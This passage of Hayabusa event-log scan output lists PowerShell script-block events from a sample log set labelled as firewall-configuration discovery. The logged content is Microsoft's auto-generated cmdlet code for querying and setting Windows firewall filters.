value=""Get-NetFirewallInterfaceTypeFilter""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.879 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallInterfaceTypeFilter""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.879 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.879 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType[]] ${InterfaceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('InterfaceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InterfaceType}) $__cmdletization_queryBuilder.FilterByProperty('InterfaceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.879 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.879 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetFirewallSecurityFilter ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.879 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallSecurityFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication[]] ${Authentication}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption[]] ${Encryption}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${OverrideBlockRules}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${LocalUser}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteUser}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteMachine}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Authentication') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Authentication}) $__cmdletization_queryBuilder.FilterByProperty('Authentication', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Encryption') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Encryption}) $__cmdletization_queryBuilder.FilterByProperty('Encryption', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OverrideBlockRules') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OverrideBlockRules}) $__cmdletization_queryBuilder.FilterByProperty('OverrideBlockRules', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalUser') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalUser}) $__cmdletization_queryBuilder.FilterByProperty('LocalUsers', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteUser') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteUser}) $__cmdletization_queryBuilder.FilterByProperty('RemoteUsers', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteMachine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteMachine}) $__cmdletization_queryBuilder.FilterByProperty('RemoteMachines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterBySecurity', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSecurityFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallSecurityFilter' function Set-NetFirewallSecurityFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] ${Encryption}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LocalUser}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUser}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = ${Authentication} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Encryption')) { [object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = ${OverrideBlockRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { [object]$__cmdletization_value = ${RemoteUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUsers'; ParameterTyp",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.879 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"e = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteMachines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 